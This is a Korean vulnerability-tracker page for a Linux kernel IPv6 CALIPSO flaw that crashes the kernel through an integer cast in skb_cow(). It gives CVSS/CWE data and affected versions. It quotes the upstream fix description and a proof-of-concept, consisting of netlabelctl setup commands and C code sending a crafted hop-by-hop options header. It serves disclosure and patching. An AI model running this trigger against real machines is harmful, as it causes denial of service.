In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
위협 신호 · CVSS · EPSS · KEV
이론적 심각도 점수
30일 내 악용 확률 예측
실측 악용 기록 없음
2주 이내 패치 — 우선 조치 대상
CVSS 벡터 · 메트릭
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H약점 (CWE)
- CWE-617
도달 가능한 Assertion — 외부 입력으로 assert 가 발동해 충돌(DoS).
상세 설명
In the Linux kernel, the following vulnerability has been resolved:
ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()
There exists a kernel oops caused by a BUG_ON(nhead < 0) at
net/core/skbuff.c:2232 in pskb_expand_head().
This bug is triggered as part of the calipso_skbuff_setattr()
routine when skb_cow() is passed headroom > INT_MAX
(i.e. (int)(skb_headroom(skb) + len_delta) < 0).
The root cause of the bug is due to an implicit integer cast in
__skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure
that delta = headroom - skb_headroom(skb) is never negative, otherwise
we will trigger a BUG_ON in pskb_expand_head(). However, if
headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta
becomes negative, and pskb_expand_head() is passed a negative value for
nhead.
Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing
"negative" headroom sizes to skb_cow() within calipso_skbuff_setattr()
by only using skb_cow() to grow headroom.
PoC:
Using netlabelctl tool:
1 netlabelctl map del default 2 netlabelctl calipso add pass doi:7 3 netlabelctl map add default address:0::1/128 protocol:calipso,7 4 5 Then run the following PoC: 6 7 int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); 8 9 // setup msghdr10 int cmsg_size = 2;11 int cmsg_len = 0x60;12 struct msghdr msg;13 struct sockaddr_in6 dest_addr;14 struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,15 sizeof(struct cmsghdr) + cmsg_len);16 msg.msg_name = &dest_addr;17 msg.msg_namelen = sizeof(dest_addr);18 msg.msg_iov = NULL;19 msg.msg_iovlen = 0;20 msg.msg_control = cmsg;21 msg.msg_controllen = cmsg_len;22 msg.msg_flags = 0;23 24 // setup sockaddr25 dest_addr.sin6_family = AF_INET6;26 dest_addr.sin6_port = htons(31337);27 dest_addr.sin6_flowinfo = htonl(31337);28 dest_addr.sin6_addr = in6addr_loopback;29 dest_addr.sin6_scope_id = 31337;30 31 // setup cmsghdr32 cmsg->cmsg_len = cmsg_len;33 cmsg->cmsg_level = IPPROTO_IPV6;34 cmsg->cmsg_type = IPV6_HOPOPTS;35 char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);36 hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 8037 38 sendmsg(fd, &msg, 0);AI 심층 분석
공격 시나리오 · 재현 가능한 PoC 페이로드 · 즉시 적용 가능한 차단 패치를 한 번에 받아 보세요. 보안 운영팀이 그대로 점검·티켓팅에 쓸 수 있는 형태로 정리해 드립니다.
영향받는 제품·버전
- linux linux_kernel4.8.1 - 5.10.248linux
- linux linux_kernel5.11 - 5.15.198linux
- linux linux_kernel5.16 - 6.1.160linux
- linux linux_kernel6.2 - 6.6.120linux
- linux linux_kernel6.7 - 6.12.64linux
- linux linux_kernel6.13 - 6.18.4linux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
- linux linux_kernellinux
영향받는 구성 (CPE) 10
- linux linux_kernel≥ 4.8.1 < 5.10.248cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*
- linux linux_kernel 4.8cpe:2.3:o:linux:linux_kernel:4.8:-:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*
- linux linux_kernel 6.19cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*
참고 자료 8
링크 내용 불러오는 중…